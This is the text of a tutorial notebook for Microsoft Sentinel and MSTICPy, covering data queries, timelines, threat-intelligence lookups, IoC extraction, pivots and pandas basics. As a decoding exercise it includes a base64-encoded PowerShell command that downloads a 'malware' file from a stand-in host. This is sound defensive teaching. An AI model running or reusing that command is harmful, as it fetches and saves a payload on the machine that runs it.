This notebook takes you through some of the features of Microsoft Sentinel Notebooks and MSTICPy.
If you are new to notebooks we strongly recommend starting with the: A Getting Started Guide For Microsoft Sentinel ML notebooks.
After you've finished running this notebook, we also recommend:
Each topic includes 'learn more' sections to provide you with the resource to deep dive into each of these topics. We encourage you to work through the notebook from start to finish.
This cell installs/updates and initializes the MSTICPy package. It should complete without errors.
If you see errors or warnings about missing configuration, please return to the A Getting Started Guide For Microsoft Sentinel ML notebook or the Configuring your environment to correct this.
%pip install --upgrade --quiet msticpy
REQ_PYTHON_VER="3.8"
REQ_MSTICPY_VER="2.0.0"
# initialize msticpy
import msticpy as mp
mp.init_notebook(
namespace=globals(),
extra_imports=["urllib.request, urlretrieve"],
friendly_exceptions=False,
)
We will use MSTICPy's QueryProvider()
class from MSTICPy to query data.
Some of the next section is a review of material contained in the A Getting Started Guide For Microsoft Sentinel ML notebook.
The query provider class has one main function:
Query results are always returned as pandas DataFrames. If you are new to using pandas look at the Introduction to Pandas section at the end of this notebook.
You can use this notebook with either live data queried from Microsoft Sentinel or with sample data downloaded from the Azure-Sentinel-Notebooks GitHub.
Run the following cell and use the option buttons to select which of these you want to use. The option buttons use a timeout. After 15 seconds the default of "Demo data" will be automatically selected.
data_opt = nbwidgets.OptionButtons(
description="Choose the data source",
buttons=["Microsoft Sentinel", "Demo data"],
default="Demo data",
timeout=15,
)
await data_opt.display_async()
Most of the code in the cell below handles download of demo data.
1. Demo is still downloaded even if chose Microsoft Sentinel (although this is
cached after the first download). The demo data
is used as a backup if the queries to the Microsoft Sentinel workspace return
no data.
2. If you see a warning "Runtime dependency of PyGObject is missing" when loading the
Microsoft Sentinel driver please see the FAQ section at the end of the
A Getting Started Guide For Microsoft Sentinel ML Notebooks notebook.
from urllib.request import urlretrieve
from pathlib import Path
from IPython.display import HTML
from tqdm.auto import tqdm
GH_URI = "https://raw.githubusercontent.com/Azure/Azure-Sentinel-Notebooks/master/{file_name}"
GH_FILES = {
"exchange_admin.pkl": "src/data",
"processes_on_host.pkl": "src/data",
"timeseries.pkl": "src/data",
"data_queries.yaml": "src/data",
"aad_logons.pkl": "src/data",
"host_logons.pkl": "src/data",
"alerts_list.pkl": "src/data",
}
def _get_gh_files(files):
tgt_path = Path("./asn_data")
tgt_path.mkdir(exist_ok=True)
for file, path in tqdm(files.items(), desc="File downloads", unit="file"):
file_path = tgt_path.joinpath(file)
if file_path.is_file():
continue
url_path = f"{path}/{file}" if path else file
urlretrieve(
GH_URI.format(file_name=url_path),
file_path
)
print("Files downloaded:", ", ".join(files.keys()))
def _update_timestamps(file):
if not file.endswith(".pkl"):
return
data = pd.read_pickle(file)
date_cols = data.select_dtypes('datetime').columns
for col in date_cols:
now_delta = pd.Timestamp("now") - data[col].max()
data[col] = data[col] + now_delta
if not date_cols.empty:
data.to_pickle(file)
print("Downloading sample files...")
_get_gh_files(GH_FILES)
for file in GH_FILES:
_update_timestamps(f"./asn_data/{file}")
# Create local data provider
qry_prov = QueryProvider("LocalData", data_paths=["./asn_data"], query_paths=["./asn_data"])
print("Local data query provider loaded")
qry_prov.connect()
# Create Microsoft Sentinel
qry_prov_azs = QueryProvider("AzureSentinel")
if data_opt.value and data_opt.value.casefold() != "demo data":
# Create Microsoft Sentinel provider and connect
qry_prov_loc = qry_prov
qry_prov = qry_prov_azs
display(HTML("""
<div style="color: White; background-color: DarkOliveGreen; padding: 5px">
<p style="font-size: 20px">Using Microsoft Sentinel as primary data source.</p>
<p>Please copy the code and click on the URL to authenticate
to Microsoft Sentinel if prompted to do so.</p>
</div>
"""
))
qry_prov.connect(WorkspaceConfig())
else:
display(HTML("""
<div style="color: White; background-color: DarkOliveGreen; padding: 5px">
<p style="font-size: 20px">Using local data as primary data source.</p>
</div>
"""
))
Now that we have connected we can query Microsoft Sentinel for data.
Before we do that there are a couple of things that help us understand what data is available to query.
The AzureSentinel QueryProvider has a "schema_tables" property that lets us get a list of tables
as well the schema (column names and data types) for each table.
After that we'll look at the queries available.
Note: For local data this will just appear as a list of files.
# Get list of tables in our Workspace with the 'schema_tables' property
qry_prov.schema_tables[:10] # We are outputting only a sample (first 10) tables for brevity
# remove the "[:10]" to see the whole list
# Display the schema for a single table
if qry_prov.environment == "AzureSentinel":
print(qry_prov.schema['SigninLogs'])
else:
md(
"Note: this is the schema of a local pandas DataFrame"
" that emulates the Microsoft Sentinel schema"
)
display(qry_prov.Azure.list_all_signins_geo().dtypes)
MSTICPy includes a number of built in queries. Most require additional parameters such as the time range and often an identifying parameter such as the host name, account name or IP address that you are querying for.
You also can list available queries from Python code with:
qry_prov.list_queries()
Get specific details about a query by calling it with "?" as a parameter:
qry_prov.Azure.list_all_signins_geo("?")
The query browser combines both of these functions in a scrollable and filterable list.
qry_prov_azs.browse_queries()
Datetime strings are painful to type in and keep track of.
Fortunately MSTICPy has an easier way to specify time parameters for queries:
query_time
widget to set the default time range for queriesnbwidgets.QueryTime
class to set a customExample of using standalone nbwidgets.QueryTime
instance
timerange = nbwidgets.QueryTime(units="day")
qry_prov.WindowsSecurity.list_host_logons(timerange, host_name="my_host")
qry_prov.query_time
# The QueryProvider will automatically
# extract the "start" and "end" parameters from the query_time property to use in the query.
logons_df = qry_prov.Azure.list_all_signins_geo()
# You can also specify these parameters explicitly
# logons_df = qry_prov.Azure.list_all_signins_geo(
# start=qry_prov.query_time.start,
# end=qry_prov.query_time.end,
# )
if logons_df.empty:
md("The query returned no rows for this time range. Using demo data.")
logons_df = qry_prov_loc.Azure.list_all_signins_geo()
# display first 5 rows of any results
logons_df.head() # If you have no data you will just see the column headings displayed
Most built-in queries support the "add_query_items" parameter. You can use this to append additional filters or other operations to the built-in queries,
start=datetime.utcnow() - timedelta(20),
from datetime import datetime, timedelta
if qry_prov.environment == "AzureSentinel":
# Actually run the query if using Microsoft Sentinel data
display(
qry_prov.SecurityAlert.list_alerts(
start=datetime.utcnow() - timedelta(2),
end=datetime.utcnow(),
add_query_items="| summarize NumAlerts=count() by AlertName"
).head()
)
else:
# Emulate the results using pandas for local data
display(
qry_prov.SecurityAlert.list_alerts()
[["AlertName", "TimeGenerated"]]
.groupby("AlertName")
.count()
.rename(columns={"TimeGenerated": "NumAlerts"})
.head()
)
Another way to run queries is to pass a full KQL query string to the query provider.
This will run the query against the workspace connected to above, and will return the data in a Pandas DataFrame. We will look at working with Pandas in a bit more detail later.
Note: exec_query is not supported for local data.
# Define our query
test_query = """
OfficeActivity
| where TimeGenerated > ago(1d)
| take 5
"""
# Pass that query to our QueryProvider
if qry_prov.environment == "LocalData":
print("exec_query not supported for local data")
print(test_query)
else:
office_events_df = qry_prov.exec_query(test_query)
display(office_events_df)
Visualizing data can provide an excellent way to analyze data, identify patterns and anomalies.
Python has a wide range of data visualization packages each of which have their own benefits and drawbacks.
We will look at some basic capabilities as well as one of the visualizations in MSTICPy.
Basic Graphs
Pandas and Matplotlib provide the easiest and simplest way to produce simple plots of data:
# Plot up to the first 5 IP addresses
plot_df = logons_df
if len(plot_df) > 100:
plot_df = plot_df[:100]
plot_df["IPAddress"].value_counts().plot.barh(
title="IP prevalence", legend=False, figsize=(8, 8)
);
# If we have lots of data just plot the first 5 rows
plot_df['IPAddress'].value_counts().plot.pie(
figsize=(8, 10), title="Share of Logons per IP"
);
Much like the built-in pandas "plot" function, MSTICPy adds an Event timelines plotting function to DataFrames.
Using the mp_timeline.plot() method on a DataFrame you can visualize the relative timing of events much more easily that from a data table.
Unlike the previous Matplotlib charts, the Event Timeline uses Bokeh plots making it interactive.
Using the toolbar buttons (to the left of the chart)
You can also use the Range Tool (the small graphic beneath the main timeline)
df.mp_plot.timeline(time_column="EventStartTimeUTC", ...)2. If there are a lot of logons in your query result the timeline may appear
from msticpy.vis.timeline import display_timeline, display_timeline_values from msticpy.vis.timeline_duration import display_timeline_durationdisplay_timeline - shows events as discrete diamondsdisplay_timeline(data, ...[other params])
disp_cols = ["UserPrincipalName", "IPAddress", "AppDisplayName", "Result"]
logons_df.mp_plot.timeline(
title="Logon events",
source_columns=disp_cols, # columns displayed in hover
)
logons_df.mp_plot.timeline(
title="Logon events by User",
source_columns=disp_cols, # columns displayed in hover
group_by="Result",
)
group_by
parameter to partition the data¶logons_df.mp_plot.timeline(
group_by="AppDisplayName",
source_columns=disp_cols
)
logons_df.mp_plot.timeline(
group_by="IPAddress",
source_columns=["AppDisplayName"],
)
Now that we have seen how to query for data, and do some basic manipulation we can look at enriching this data with additional data sources.
For this we are going to use an external threat intelligence provider to give us some more details about an IP address in our dataset using the MSTICPy TIProvider feature.
# Create our TI provider
ti = TILookup()
# Get the first logon IP address from our dataset
ip = logons_df.iloc[1]['IPAddress']
md(f"IP Address to lookup is {ip}")
# Look up the IP in VirusTotal
ti_resp = ti.lookup_ioc(ip)
# Format our results as a DataFrame
ti_resp = ti.result_to_df(ti_resp)
display(ti_resp)
ti_results = ti.lookup_iocs(logons_df[["IPAddress"]].drop_duplicates().head(), "IPAddress")
ti.browse_results(ti_results, severities=["information", "warning", "high"])
MSTICPy includes further threat intelligence capabilities as well as other data enrichment options. More details on these can be found in the documentation.
With the data we have collected we may wish to perform some analysis on it in order to better understand it.
MSTICPy includes a number of features to help with this, and there are a vast array of other data analysis capabilities available via Python ranging from simple processes to complex ML models.
We will start simply and look at how we can decode some obfuscated command lines, so that we understand their content.
from msticpy.transform import base64unpack as b64
# Take our encoded Powershell Command
b64_cmd = "powershell.exe -encodedCommand SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9jb250b3NvLmNvbS9tYWx3YXJlIC1PdXRGaWxlIEM6XG1hbHdhcmUuZXhl"
# Unpack the Base64 encoded elements
unpack_txt = b64.unpack(input_string=b64_cmd)
# Display our results and transform for easier reading
unpack_txt[1].T
We can also use MSTICpy to extract Indicators of Compromise (IoCs) from a dataset.
The IoCExtract class makes it easy to extract and match on a set of IoCs within our data.
In the example below we take a US Cybersecurity & Infrastructure Security Agency (CISA) report and extract all domains listed in the report.
import requests
# Set up our IoCExtract oject
ioc_extractor = IoCExtract()
# Download our threat report
data = requests.get("https://www.us-cert.gov/sites/default/files/publications/AA20-099A_WHITE.stix.xml")
# Extract URLs listed in our report
iocs = ioc_extractor.extract(data.text, ioc_types="url")['url']
# Display the first 5 iocs found in our report
list(iocs)[:5]
There are a wide range of options when it comes to data analysis in notebooks using Python. Here are some useful resources to get you started:
Pivot functions use the concept of Cyber Entities to group MSTICPy functionality logically.
An entity is something like an Account, IP Address or Host, and has one or more identifying properties.
Pivot functions are methods of Entities that provide quick access to:
Pivot functions are dynamically attached to entities - so we need to load the Pivot library to initialize this
import warnings
from msticpy.datamodel.entities import *
with warnings.catch_warnings():
warnings.simplefilter("ignore")
pivot = Pivot(namespace=globals())
Use the pivot browser to see what functions are available for different entities.
The Help drop-down panels show you more detail about the selected function.
pivot.browse()
You can pass a single value to a pivot function.
The result is returned as a pandas DataFrame.
Here are five examples with the output shown below.
from IPython.display import HTML
display(HTML("Dns resolution<br>"))
display(Dns.dns_resolve("www.microsoft.com"))
display(HTML("<br>Dns components<br>"))
display(Dns.util.dns_components("www.microsoft.com"))
display(HTML("<br>IP address type<br>"))
display(IpAddress.ip_type("24.16.133.227"))
display(HTML("<br>IP address ownership<br>"))
display(IpAddress.whois("24.16.133.227"))
display(HTML("<br>IP address location<br>"))
display(IpAddress.geoloc("24.16.133.227"))
You can also pass a DataFrame as a parameter. You also need to provide the column name that contains the data that you want to process.
logons_subset = logons_df.drop_duplicates("IPAddress").head()
IpAddress.whois(logons_subset, column="IPAddress")
When using a DataFrame as input, you can also join the output data to the input data.
IpAddress.whois(logons_subset[["IPAddress", "AppDisplayName", "TimeGenerated"]], column="IPAddress", join="left")
And because pivot functions always return DataFrames, you can easily use the output as input to MSTICPy functions.
The first example shows sending the results from the WhoIs pivot function to a timeline plot.
IpAddress.whois(
logons_subset[["IPAddress", "AppDisplayName", "TimeGenerated"]],
column="IPAddress",
join="left"
).mp_plot.timeline(group_by="asn_description")
The second example shows using the tilookup_url Url pivot function to check
Threat intelligence reports for a URL and using the output as input to the TIBrowser
TILookup.browse_results(Url.tilookup_url("http://85.214.149.236:443/sugarcrm/themes/default/images/"))
This notebook has shown some basic components of MSTICPy and how to use them in notebooks for Microsoft Sentinel for security investigaitons.
There are many more things possible using notebooks. We strongly encourage you to read the material referenced in the "Learn More" sections in this notebook.
You can also explore the other Microsoft Sentinel notebooks in order to take advantage of the pre-built hunting logic, and understand other analysis techniques that are possible.
If you are working with data in the notebook a lot you will want to learn about pandas. Our query results are returned in the form of a Pandas DataFrame: they are a pivotal to Microsoft Sentinel notebooks and MSTICPy and are used for both input and output formats.
Pandas DataFrames are incredibly versatile data structures with a lot of useful features. You might think of them as programmable Excel worksheets.
We will cover a small number of them here and we recommend that you check out the Learn more section to learn more about Pandas features.
The first thing we want to do is display our DataFrame. If the DataFrame is the last item in a code cell, you can just run the cell to display the data.
You can the Jupyter display function - display(df)
to explicitly display it - this is especially
useful if you want to display a DataFrame from the middle of a code block in a cell.
# For this section we are going to create a DataFrame from data saved in a csv file
data = logons_df
# Display our DataFrame - using head to limit to first 3 rows
display(data.head(3))
You may not want to display the whole DataFrame and instead display only a subset of items.
There are numerous ways to do this and the cell below shows some of the most widely used functions.
md("Data size:", "bold")
md(f"DateFrame shape is {data.shape[0]} rows x {data.shape[1]} columns")
md("Display the first 2 rows using head(): ", "bold")
display(data.head(2))
md("Display the 3rd row using iloc[]: ", "bold")
display(data.iloc[3])
md("Show the column names in the DataFrame ", "bold")
display(data.columns)
md("Display just the TimeGenerated and TenantId columnns: ", "bold")
display(data[["TimeGenerated", "TenantId"]].head())
We can also choose to select a subset of our DataFrame by filtering the contents of the DataFrame.
data[<boolean expression>]returns all rows in the dataframe where the boolean expression is True.
md("Display only rows where AppDisplayName value is 'Azure Portal': ", "bold")
filtered_df = data[data['AppDisplayName'] == "Azure Portal"]
display(filtered_df.head())
md("Display rows where ClientAppUsed is either 'Browser' or 'Mobile Apps and Desktop clients':", "bold")
filtered_df = data[data["ClientAppUsed"].isin(["Browser", "Mobile Apps and Desktop clients"])].head()
display(filtered_df)
Grouping and calculating aggregate totals on the groups is done using the groupby
function.
# The basic groupby syntax counts all of columns other than the group column
display(data.groupby("AppDisplayName").count().head())
# Selecting a subset of the columns and renaming gives a more readable output.
display(
data[["AppDisplayName", "TimeGenerated"]]
.groupby("AppDisplayName")
.count()
.rename(columns={"TimeGenerated": "AppCount"})
.head()
)
# Note: you can surround dataframe chained operations (as in the previous example)
# with parentheses to split them into a more readable format.
Our DataFrame call also be extended to add new columns with additional data if required. The new column data can be static or calculated data as show in these examples.
data_mod = data.copy()
data_mod["NewCol"] = "Look at my new data!" # Add the same string to every row in this column
data_mod["Plus1Hr"] = data_mod["TimeGenerated"] + pd.Timedelta("1d") # Calculated column (add 1 day to date)
display(data_mod[["TenantId","AppDisplayName", "TimeGenerated", "NewCol", "Plus1Hr"]].head(5))
There is a lot more you can do with Pandas, the links below provide some useful resources: